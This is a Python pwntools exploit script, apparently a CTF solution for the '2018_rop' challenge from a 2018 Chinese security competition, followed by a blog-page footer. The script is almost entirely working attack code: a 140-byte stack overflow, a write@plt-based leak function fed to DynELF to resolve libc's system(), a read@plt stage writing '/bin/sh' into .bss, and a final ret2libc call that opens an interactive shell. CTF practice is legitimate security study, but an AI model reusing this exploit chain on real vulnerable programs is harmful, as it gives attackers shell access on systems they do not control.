from pwn import *
p = process('./2018_rop')
gotwrite = 0x0804A010
pltwrite = 0x080483A0
start = 0x080483C0
bss = 0x0804A020
pltread = 0x08048360
def leak(address):
payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04)
p.sendline(payload)
leakaddress = p.recv(4)
return leakaddress
d = DynELF(leak, elf=ELF('./2018_rop'))
system_addr = d.lookup('system', 'libc')
payload = 'a' * 140 + p32(pltread) + p32(start) + p32(0) + p32(bss) + p32(8)
p.send(payload)
p.send("/bin/sh\0")
payload = 'a' * 140 + p32(system_addr) + p32(0xdeadbeef) + p32(bss)
p.sendline(payload)
p.interactive()
铁人三项(第五赛区)2018 rop
最新推荐文章于 2024-01-08 12:52:27 发布